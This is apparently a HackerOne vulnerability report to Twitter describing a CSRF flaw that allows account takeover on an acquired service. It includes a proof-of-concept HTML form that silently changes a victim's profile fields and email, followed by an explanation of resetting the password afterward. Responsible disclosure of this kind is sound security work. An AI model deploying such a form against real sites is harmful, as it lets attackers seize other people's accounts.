Twitter: URGENT : Account Take Over Vulnerability

ID H1:100849
Type hackerone
Reporter hussein98d
Modified 2015-12-21T22:16:28


Hello ! This is an urgent report that you should immediately take care of !!

I found out an account take over vulnerability on your acquisition :

Proof of concept code

<title>CSRF Attack Page: /get-started/complete</title>


<!-- attack -->

<form method="POST" action="">
<input type="hidden" name="utf8" value="✓"/>
<input type="hidden" name="_method" value="patch"/>
<input type="hidden" name="authenticity_token" value=""/>
<input type="hidden" name="commit" value="Get Started"/>
<input type="hidden" name="user[name]" value="Hacked"/>
<input type="hidden" name="user[email]" value=""/>
<input type="hidden" name="user[username]" value="hacked123"/>
<input type="hidden" name="user[phone_number]" value=""/>
<input type="hidden" name="user[location_id]" value="79790"/>
<input type="hidden" name="user[gender]" value=""/>
<input type="submit" value="submit">s

<!-- /attack -->


The authenticity_token parameter is not properly validated by the end of the server when a user submits the form . A hacker can , after changing the email of his victim , reset the password and login without any problem !

Here is a video that I made : (unlisted video)

Best Regards Hussein